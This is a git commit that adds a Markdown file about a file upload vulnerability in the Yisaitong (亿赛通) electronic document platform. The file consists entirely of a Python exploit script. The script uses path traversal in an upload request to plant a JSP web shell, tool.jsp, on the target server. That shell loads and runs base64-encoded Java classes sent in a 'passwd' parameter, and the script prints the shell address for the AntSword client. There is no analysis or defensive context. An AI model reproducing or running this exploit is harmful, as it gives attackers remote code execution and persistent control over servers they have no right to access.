Create 亿赛通电子文档平台文件上传漏洞.md

2023-08-19 21:12:38 +08:00 · 2023-08-19 21:12:38 +08:00 · e899ceb9c7
commit e899ceb9c7
parent 3958a0acec
1 changed files with 53 additions and 0 deletions
--- a/亿赛通电子文档平台文件上传漏洞.md
+++ b/亿赛通电子文档平台文件上传漏洞.md
@ -0,0 +1,53 @@
+## 亿赛通电子文档平台文件上传漏洞
+
+```
+import requests
+from urllib.parse import urljoin
+import sys
+payload="/CDGServer3/fileType/importFileType.do?flag=syn_user_policy"
+request_file = {'fileshare':(('/..\..\..\..\webapps\ROOT\\tool.jsp',"""<%!
+    class U extends ClassLoader {
+        U(ClassLoader c) {
+            super(c);
+        }
+        public Class g(byte[] b) {
+            return super.defineClass(b, 0, b.length);
+        }
+    }
+ 
+    public byte[] base64Decode(String str) throws Exception {
+        try {
+            Class clazz = Class.forName("sun.misc.BASE64Decoder");
+            return (byte[]) clazz.getMethod("decodeBuffer", String.class).invoke(clazz.newInstance(), str);
+        } catch (Exception e) {
+            Class clazz = Class.forName("java.util.Base64");
+            Object decoder = clazz.getMethod("getDecoder").invoke(null);
+            return (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, str);
+        }
+    }
+%>
+<%
+    String cls = request.getParameter("passwd");
+    if (cls != null) {
+        new U(this.getClass().getClassLoader()).g(base64Decode(cls)).newInstance().equals(pageContext);
+    }
+%>"""))}
+def title():
+    print("""
+    亿赛通文件上传
+    """)
+def exp(url):  
+    url1=urljoin(url,payload)
+    req=requests.post(url=url1,files=request_file,verify=False,timeout=5)
+    shell=urljoin(url,"tool.jsp")
+    if(req.text.find("xmlFail")>0):
+        print("成功！")
+        print("蚁剑连接地址%s,密码passwd"%shell)
+if __name__ == '__main__':
+    title
+    if(len(sys.argv) !=2):
+        print("eg:python exp.py url")
+    else:
+        exp(sys.argv[1])
+
+```